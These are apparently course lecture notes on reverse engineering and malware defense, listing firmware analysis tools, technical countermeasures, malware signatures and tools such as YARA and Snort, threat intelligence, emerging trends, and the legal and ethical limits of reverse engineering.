Reverse Engineering: Deconstructing the firmware to understand its functionality.

Tools for Firmware Analysis

Binwalk: Extracts files and code from firmware images
Firmadyne: Emulates firmware for dynamic analysis
CHIPSEC: Analyzes the security of firmware and hardware components
 Ch12

Introduction to cybersecurity defense

Importance of defending against malware and cyber threats
Role of reverse engineering in identifying and mitigating threats
Cybersecurity defense as a proactive and reactive:
o Proactively, it involves identifying vulnerabilities and implementing preventive
measures.
o Reactively, it includes responding to and mitigating the impact of ongoing threats.

Challenges in Cybersecurity Defense

Increasing sophistication of malware.
Challenges in identifying zero-day vulnerabilities.

Developing and Implementing Countermeasures

The need for: strategies, tools, and actions designed to identify, prevent, and mitigate the impact of
malicious software on digital systems and networks.

Examples of technical countermeasures:

Firewalls
Intrusion Detection/Prevention Systems (IDPS)
Sandboxing environments
Endpoint Detection and Response (EDR) solutions
Network segmentation
Antivirus and anti-malware software

Steps in implementing countermeasures:

Identify vulnerabilities.
Deploy defense mechanisms.
Monitor and update continuously.

Building Signatures for Malware Detection

Malware signatures are unique patterns or characteristics derived from malicious software that
enable its detection and identification by security systems.

Types of signatures:

Static (examines code without running it)
Behavioral (Observes malware actions during execution).
Unique signatures:

are critical for accurately identifying specific malware strains, ensuring targeted detection, and
preventing false positives, which enhances the effectiveness of cybersecurity systems

Tools for Signature-Based Detection:

YARA: A tool used for identifying and classifying files based on custom rules created by analysts,
to detect specific patterns or malware.
Snort: A network intrusion detection system (IDS) that uses predefined or custom rules to
identify malicious or suspicious network activity.

Challenges in Signature-Based Detection:

1. Polymorphic Malware: Malware that alters its code structure while maintaining its functionality.
2. Encrypted Payloads: Malware that encrypts its code or data to obscure its operations.

Automated Threat Intelligence Analysis

Threat intelligence: is defined as the collection, processing, and analysis of information about potential
or existing threats to provide actionable insights for enhancing cybersecurity defenses and mitigating
risks.

Automated tools and platforms for threat analysis

Benefits:

Faster response times
Improved threat identification

Examples of automated analysis in action:

WannaCry Ransomware Incident
SolarWinds Supply Chain Attack

Emerging Trends in Reverse Engineering and Malware

Use of AI in malware creation and analysis.
Increasing use of encryption in malware.
Evolution of ransomware and supply chain attacks.
Advances in reverse engineering tools.
Role of cloud computing in malware analysis.
Legal and Ethical Aspects of Reverse Engineering

Importance of understanding legal boundaries:

Intellectual property laws
International treaties

Ethical considerations in reverse engineering:

respecting intellectual property rights
avoiding unauthorized access or tampering
prioritizing user privacy
ensuring transparency in findings
adhering to relevant laws and regulations